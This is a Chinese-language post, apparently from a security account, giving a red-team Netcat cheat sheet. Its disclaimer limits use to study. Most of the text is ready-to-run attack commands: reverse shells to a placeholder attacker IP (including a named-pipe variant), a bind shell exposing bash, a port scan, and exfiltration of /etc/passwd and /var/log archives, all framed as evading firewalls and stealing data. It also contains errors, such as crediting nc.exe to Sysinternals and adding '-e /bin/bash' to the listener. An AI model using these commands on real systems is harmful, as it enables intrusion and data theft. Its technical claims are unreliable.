泷羽Sec-静安,专注网络安全与编程技术的学习与分享,探索技术细节与实际应用。声明:本公众号所分享的工具与资源,仅供学习与研究使用,严禁用于任何非法活动。
Netcat(nc)
Netcat(nc)因其灵活的TCP/UDP通信能力,在红队渗透测试中扮演着重要角色。• Netcat下载:Windows版nc.exe
可从Sysinternals Suite获取。后台回复“配套工具”获取本文的工具
1. 反向Shell获取控制权
用途:绕过防火墙限制,建立隐蔽的远程控制通道。
操作步骤:
-
攻击端监听(接收Shell):
nc -lvp 4444 -e /bin/bash # 传统方法(需目标支持-e参数)
-
目标端连接(主动回连):
nc [攻击者IP] 4444 -e /bin/bash # 直接执行Shell
绕过限制技巧(无
-e
参数时):mkfifo /tmp/f; nc [攻击者IP] 4444 < /tmp/f | /bin/bash > /tmp/f 2>&1
优势:通过命名管道实现无
-e
参数环境下的Shell反弹。
2. 端口扫描与监听
用途:快速探测目标开放端口或搭建临时服务。
实战命令:
• 端口扫描(快速识别脆弱服务):
nc -zv 192.168.1.100 1-1024 # 扫描1-1024端口(-z为扫描模式,-v显示详情)
• 监听端口(捕获敏感流量):
nc -l -p 8080 > captured_data.log # 记录所有传入数据到文件
3. 文件传输与数据窃取
用途:内网横向移动时快速交换工具或窃取数据。
操作示例:
• 单向传输:
# 接收端(攻击机):
nc -l -p 1234 > stolen_data.tar.gz
# 发送端(目标机):
nc [攻击者IP] 1234 < /etc/passwd # 发送敏感文件
• 目录批量传输(结合tar压缩):
# 目标机打包发送:
tar -czf - /var/log/ | nc [攻击者IP] 1234
# 攻击机接收解压:
nc -l -p 1234 | tar -xzvf -
4. 内网穿透与端口转发
用途:突破网络边界,访问受限内网资源。
典型场景:
• 正向代理(目标机可直连外网):
# 目标机监听内网服务:
nc -l -p 5555 -e /bin/bash # 暴露Shell到本地5555端口